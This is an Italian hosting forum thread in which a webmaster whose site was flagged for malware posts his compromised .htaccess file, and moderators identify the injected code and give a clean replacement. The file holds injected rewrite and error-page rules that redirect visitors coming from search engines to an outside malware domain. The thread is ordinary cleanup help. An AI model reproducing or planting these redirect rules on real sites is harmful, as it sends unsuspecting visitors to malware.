Visualizzazione risultati 1 fino 11 di 11

Discussione: Malfunzionamento account e utilizzazione ridistribuzione malware

  1. #1
    Kodama non  connesso Neofita
    Data registrazione
    02-01-2007
    Messaggi
    16

    Exclamation Malfunzionamento account e utilizzazione ridistribuzione malware

    Ciao a tutti, sono ormai da un po' di anni registrato su altervista, e volevo chiedere come risolvere un problema che mi sono accorto oggi di avere... vi spiego, quando sono andato sulla home del mio sito(perch devo fare un upload per rinnovarlo completamente, quindi guardavo cosa ho messo e come migliorarlo) mi apparsa una pagina (http://img687.imageshack.us/img687/5410/paginavirus.jpg) dicendomi che il sito porta virus, allora ho provato ad accedere al pannello di controllo ma non riesco ad accedere... aiutooo
    (ringrazio in anticipo :) )
    Ultima modifica di Kodama : 09-01-2012 alle ore 17.05.13

  2. #2
    L'avatar di andreafallico
    andreafallico non  connesso Super Moderatore
    Data registrazione
    02-06-2009
    Messaggi
    1,981

    Predefinito

    Accedi via FTP e posta il contenuto del file .htaccess, perch contiene codice malevolo: http://lab.andrea-fallico.it/htscan/...ltervista.org/
    Ultima modifica di andreafallico : 09-01-2012 alle ore 17.55.49

  3. #3
    Kodama non  connesso Neofita
    Data registrazione
    02-01-2007
    Messaggi
    16

    Predefinito

    Citazione Originalmente inviato da andreafallico Visualizza messaggio
    Accedi via FTP e posta il contenuto del file .htaccess, perch contiene codice malevolo: http://lab.andrea-fallico.it/htscan/...ltervista.org/
    purtroppo non riesco ad accedere neanche via ftp ho gi provato, rimane fermo a caricare senza segni di vita...

    --------

    ci sono riuscito, ecco quello che mi hai chiesto:

    Codice:
    <IfModule mod_rewrite.c>
    RewriteEngine On
    RewriteCond %{HTTP_REFERER} ^.*(google|ask|yahoo|baidu|youtube|wikipedia|qq|excite|altavista|msn|netscape|aol|hotbot|goto|infoseek|mamma|alltheweb|lycos|search|metacrawler|bing|dogpile|facebook|twitter|blog|live|myspace|mail|yandex|rambler|ya|aport|linkedin|flickr|nigma|liveinternet|vkontakte|webalta|filesearch|yell|openstat|metabot|nol9|zoneru|km|gigablast|entireweb|amfibi|dmoz|yippy|search|walhello|webcrawler|jayde|findwhat|teoma|euroseek|wisenut|about|thunderstone|ixquick|terra|lookle|metaeureka|searchspot|slider|topseven|allthesites|libero|clickey|galaxy|brainysearch|pocketflier|verygoodsearch|bellnet|freenet|fireball|flemiro|suchbot|acoon|cyber-content|devaro|fastbot|netzindex|abacho|allesklar|suchnase|schnellsuche|sharelook|sucharchiv|suchbiene|suchmaschine|web-archiv)\.(.*)
    RewriteRule ^(.*)$ h**p://balance-rancho.ru/access/index.php[R=301,L]
    RewriteCond %{HTTP_REFERER} ^.*(web|websuche|witch|wolong|oekoportal|t-online|freenet|arcor|alexana|tiscali|kataweb|orange|voila|sfr|startpagina|kpnvandaag|ilse|wanadoo|telfort|hispavista|passagen|spray|eniro|telia|bluewin|sympatico|nlsearch|atsearch|klammeraffe|sharelook|suchknecht|ebay|abizdirectory|alltheuk|bhanvad|daffodil|click4choice|exalead|findelio|gasta|gimpsy|globalsearchdirectory|hotfrog|jobrapido|kingdomseek|mojeek|searchers|simplyhired|splut|the-arena|thisisouryear|ukkey|uwe|friendsreunited|jaan|qp|rtl|search-belgium|apollo7|bricabrac|findloo|kobala|limier|express|bestireland|browseireland|finditireland|iesearch|ireland-information|kompass|startsiden|confex|finnalle|gulesider|keyweb|finnfirma|kvasir|savio|sol|startsiden|allpages|america|botw|chapu|claymont|clickz|clush|ehow|findhow|icq|goo|westaustraliaonline)\.(.*)
    RewriteRule ^(.*)$ h**p://balance-rancho.ru/access/index.php[R=301,L]
    </IfModule>
    
    # # av:Toolbar
    SetEnv AV_TOOLBAR 0
    
    # # av:PHP-RG
    php_flag register_globals on
    # # av:php5-engine
    AddHandler av-php5 .php
    
    ErrorDocument 400 h**p://balance-rancho.ru/access/index.php
    ErrorDocument 401 h**p://balance-rancho.ru/access/index.php
    ErrorDocument 403 h**p://balance-rancho.ru/access/index.php
    ErrorDocument 404 h**p://balance-rancho.ru/access/index.php
    ErrorDocument 500 h**p://balance-rancho.ru/access/index.php
    Ultima modifica di andreafallico : 09-01-2012 alle ore 18.34.15

  4. #4
    L'avatar di andreafallico
    andreafallico non  connesso Super Moderatore
    Data registrazione
    02-06-2009
    Messaggi
    1,981

    Predefinito

    Sostituiscilo con questo:
    Codice:
    # # av:Toolbar
    SetEnv AV_TOOLBAR 0
    
    # # av:PHP-RG
    php_flag register_globals on
    # # av:php5-engine
    AddHandler av-php5 .php
    e poi leggi qui: Sospensione account e Attenzione: Strano codice presente nelle mie pagine!

  5. #5
    Kodama non  connesso Neofita
    Data registrazione
    02-01-2007
    Messaggi
    16

    Predefinito

    scusami la domanda forse sciocca, ma sostituisco tutto il codice del file con quello che mi hai dato tu?
    grazie ancora :D

  6. #6
    L'avatar di andreafallico
    andreafallico non  connesso Super Moderatore
    Data registrazione
    02-06-2009
    Messaggi
    1,981

  7. #7
    Kodama non  connesso Neofita
    Data registrazione
    02-01-2007
    Messaggi
    16

    Predefinito

    perfetto funziona tutto, ora faccio una scansione sul pc come mi hai detto e uppo i nuovi file di miglioramento di interfaccia sul sito come volevo fare. Grazie ancora dell'aiuto :D

  8. #8
    Kodama non  connesso Neofita
    Data registrazione
    02-01-2007
    Messaggi
    16

    Predefinito

    ciao, scusami se riposto in questa sezione, ma continuano a entrarmi nell'account(cambiandomi il contenuto di .htaccess). Addirittura altervista mi ha inviato una mail:

    Gent. Webmaster,

    durante le ultime 24h abbiamo rilevato un flusso anomalo di emails inviate dal tuo sito.
    Questo pu essere dovuto alla presenza nel tuo spazio web di applicativi (forum, blog, CMS...) affetti da problemi di sicurezza e utilizzati da terze parti per inviare spam.

    Al fine di prevenire abusi di servizio l'invio di email dal tuo sito stato temporaneamente bloccato, il nostro intervento mirato a tutelare non solo la sicurezza del tuo sito web ma anche quella della comunit stessa di internet, in quanto una porta aperta agli spammers rappresenta un danno per tutti.

    Ti preghiamo quindi di:

    1) Controllare ed eventualmente aggiornare i tuoi applicativi alle ultime versioni
    2) Modificare la password d'accesso al tuo sito e verificare che non sia in possesso di altri
    3) Verificare che il tuo PC non sia affetto da virus/worms

    L'invio delle email dal tuo sito potr essere riabilitato cliccando sul link che trovi di seguito.


    Ho fatto una scansione del mio pc ma non ho trovato nulla, io uso kaspersky Pure, quindi se dice che non ci sono, vuol dire che non ci sono. Inoltre ho cambiato nuovamente la password, suggerimenti? Ringrazio per la pazienza :)

  9. #9
    L'avatar di Gianluca
    Gianluca non  connesso Amministratore
    Data registrazione
    15-02-2001
    Messaggi
    18,026

    Predefinito

    kodama:

    dovresti ripulire a fondo il tuo spazio web (ci sono files del 2009), allo stato attuale hai un filemanager nella root del tuo sito (ovviamente non il caso di postare il link qui), quindi chiunque pu modificare i tuoi contenuti.
    Gianluca

  10. #10
    comiter non  connesso Neofita
    Data registrazione
    03-09-2006
    Messaggi
    2

    Predefinito errore 403! niente link!

    comiter = clare = elate

    non riesco a raggiunger il sito
    apparendo errore 403

    ---------------------------------------

    non riesco a raggiungere il link

    rimane solo la segnalazione di errore 403

    ---------------------------------------

    solito blocco link con segnalato
    errore 403

    ---------------------------------------

    enigmatico errore 403
    viene segnalato
    e non si riesce ad accedere al sito

    spero che situazione evolva positivamente
    Ultima modifica di andreafallico : 01-02-2012 alle ore 18.08.45

  11. #11
    L'avatar di dapeco
    dapeco non  connesso Community Manager
    Data registrazione
    21-10-2003
    Residenza
    Brusasco (To)
    Messaggi
    4,904

    Predefinito

    Citazione Originalmente inviato da elate Visualizza messaggio
    enigmatico errore 403
    viene segnalato
    e non si riesce ad accedere al sito

    spero che situazione evolva positivamente
    elate, hai seguito quanto su scritto?
    Ho visto cose che voi utenti non potreste immaginare... siti da combattimento irregolari al largo dei bastioni di Orione. E ho visto account balenare nel buio vicino alle porte di Tannhauser. E tutti quei momenti andranno perduti nel tempo come lacrime nella pioggia. tempo di sospendere...

    ASD Brusasco - C' altro sport oltre al calcio!

    "Io sono vivo, voi siete morti" (Philip Dick, Ubik)

Regole di scrittura

  • Non puoi creare nuove discussioni
  • Non puoi rispondere ai messaggi
  • Non puoi inserire allegati.
  • Non puoi modificare i tuoi messaggi
  •